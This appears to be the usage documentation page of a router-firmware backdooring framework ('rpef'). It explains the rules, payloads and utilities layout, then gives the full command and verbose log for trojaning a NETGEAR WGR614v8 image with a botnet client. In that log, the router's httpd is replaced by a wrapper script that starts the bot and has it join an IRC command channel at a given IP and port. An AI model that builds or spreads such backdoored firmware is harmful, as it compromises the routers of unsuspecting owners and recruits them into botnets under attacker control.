-
Notifications
You must be signed in to change notification settings - Fork 31
Usage Documentation
Currently, the framework includes a number of firmware image modules:
- 'Verified' - This module is confirmed to work and is stable.
- 'Unverified' - This module is believed to work or should work with little additional effort, but awaits being tested on a physical device.
- 'Testing' - This module is currently undergoing development and is unstable for the time being. Users should consider this module a "work in progress."
- 'Roadblock' - Issues have halted progress on this module for the time being. Certain unavailable utilities or significant reverse engineering work may be necessary.
For a list of options, run:
python rpef.py -h
For a list of all currently supported firmware targets, run:
python rpef.py -ll
The script is written for Python 2.6 and may require the installation of a few modules. It is typically invoked as:
python rpef.py <firmware image> <output file> <payload>
and accepts a number of optional switches (see -h).
The rules/ directory stores a hierarchy of rules/<vendor>/<module> directories. One module correlates to one firmware checksum (not to one specific router) since multiple routers have been observed to run the exact same firmware. Within each module is properties.json which stores the language and order of operations necessary to unpackage, backdoor, and repackage the target firmware image. The payloads/ directory stores cross-compiled binaries ready for deployment, and the optional dependencies/ directory stores miscellaneous files to aid the process.
The utilities/ directory stores pre-compiled x86 binaries to perform tasks such as packing/unpacking filesystems, compressing/decompressing data (for which no suitable .py module exists), and calculating checksums.
The payloads_src/ directory stores source code for the payloads themselves. All payloads are written from scratch to keep them as small as possible.
To verbosely generate a firmware image for the WGR614v8 backdoored with a botnet client, run:
python rpef.py WGR614v8-V1.2.10_21.0.52NA.chk WGR614v8-V1.2.10_21.0.52NA_backdoor.chk botnet -v
And the process should proceed as follows:
[+] Verifying checksum
Calculated checksum: 38f238872cfb32844663a8a7d47e93d5
Matched target: NETGEAR WGR614v8 1.2.10NA (Verified)
[+] Extracting parts from firmware image
Step 1: Extract WGR614v8-V1.2.10_21.0.52NA.chk, Offset 58, Size 506252 -> /tmp/tmpnIWTqZ/headerkernel.bin
Step 2: Extract WGR614v8-V1.2.10_21.0.52NA.chk, Offset 506310, Size 3063844 -> /tmp/tmpnIWTqZ/filesystem.bin
[+] Unpacking filesystem
Step 1: unsquashfs-1.0 /tmp/tmpnIWTqZ/filesystem.bin -> /tmp/tmpnIWTqZ/extracted_fs
Executing: utilities/unsquashfs-1.0 -dest /tmp/tmpnIWTqZ/extracted_fs /tmp/tmpnIWTqZ/filesystem.bin
created 317 files
created 32 directories
created 53 symlinks
created 0 devices
created 0 fifos
[+] Inserting payload
Step 1: Copy rules/NETGEAR/WGR614v8_1.2.10NA/payloads/botnet /tmp/tmpnIWTqZ/extracted_fs/usr/sbin/botnet
Step 2: Move /tmp/tmpnIWTqZ/extracted_fs/usr/sbin/httpd /tmp/tmpnIWTqZ/extracted_fs/usr/sbin/httpd.bak
Step 3: Touch /tmp/tmpnIWTqZ/extracted_fs/usr/sbin/httpd
Step 4: Appendtext "#!/bin/msh
" >> /tmp/tmpnIWTqZ/extracted_fs/usr/sbin/httpd
[+] INPUT REQUIRED, IP address of IRC server: 1.2.3.4
[+] INPUT REQUIRED, Port of IRC server: 6667
[+] INPUT REQUIRED, Channel to join (include #): #busticati
[+] INPUT REQUIRED, Prefix of bot nick: awesome
Step 5: Appendtext "/usr/sbin/botnet 1.2.3.4 6667 \#busticati awesome &
" >> /tmp/tmpnIWTqZ/extracted_fs/usr/sbin/httpd
Step 6: Appendtext "/usr/sbin/httpd.bak
" >> /tmp/tmpnIWTqZ/extracted_fs/usr/sbin/httpd
Step 7: Chmod 777 /tmp/tmpnIWTqZ/extracted_fs/usr/sbin/httpd
[+] Building filesystem
Step 1: mksquashfs-2.1 /tmp/tmpnIWTqZ/extracted_fs, Blocksize 65536, Little endian -> /tmp/tmpnIWTqZ/newfs.bin
Executing: utilities/mksquashfs-2.1 /tmp/tmpnIWTqZ/extracted_fs /tmp/tmpnIWTqZ/newfs.bin -b 65536 -root-owned -le
Creating little endian 2.1 filesystem on /tmp/tmpnIWTqZ/newfs.bin, block size 65536.
Little endian filesystem, data block size 65536, compressed data, compressed metadata, compressed fragments
Filesystem size 2995.07 Kbytes (2.92 Mbytes)
31.14% of uncompressed filesystem size (9616.55 Kbytes)
Inode table size 3317 bytes (3.24 Kbytes)
34.70% of uncompressed inode table size (9558 bytes)
Directory table size 3237 bytes (3.16 Kbytes)
52.41% of uncompressed directory table size (6176 bytes)
Number of duplicate files found 5
Number of inodes 404
Number of files 319
Number of fragments 30
Number of symbolic links 53
Number of device nodes 0
Number of fifo nodes 0
Number of socket nodes 0
Number of directories 32
Number of uids 1
root (0)
Number of gids 0
[+] Gluing parts together
Step 1: Touch WGR614v8-V1.2.10_21.0.52NA_backdoor.chk
Step 2: Appendfile /tmp/tmpnIWTqZ/headerkernel.bin >> WGR614v8-V1.2.10_21.0.52NA_backdoor.chk
Step 3: Appendfile /tmp/tmpnIWTqZ/newfs.bin >> WGR614v8-V1.2.10_21.0.52NA_backdoor.chk
[+] Padding image with null bytes
Step 1: Pad WGR614v8-V1.2.10_21.0.52NA_backdoor.chk to size 3575808 with 0 (0x00)
[+] Generating CHK header
Step 1: packet WGR614v8-V1.2.10_21.0.52NA_backdoor.chk rules/NETGEAR/WGR614v8_1.2.10NA/dependencies/compatible.txt rules/NETGEAR/WGR614v8_1.2.10NA/dependencies/ambitCfg_NA.h
Executing: utilities/packet -k WGR614v8-V1.2.10_21.0.52NA_backdoor.chk -b rules/NETGEAR/WGR614v8_1.2.10NA/dependencies/compatible.txt -i rules/NETGEAR/WGR614v8_1.2.10NA/dependencies/ambitCfg_NA.h
[+] Removing temporary files
Step 1: Rmdir /tmp/tmpnIWTqZ/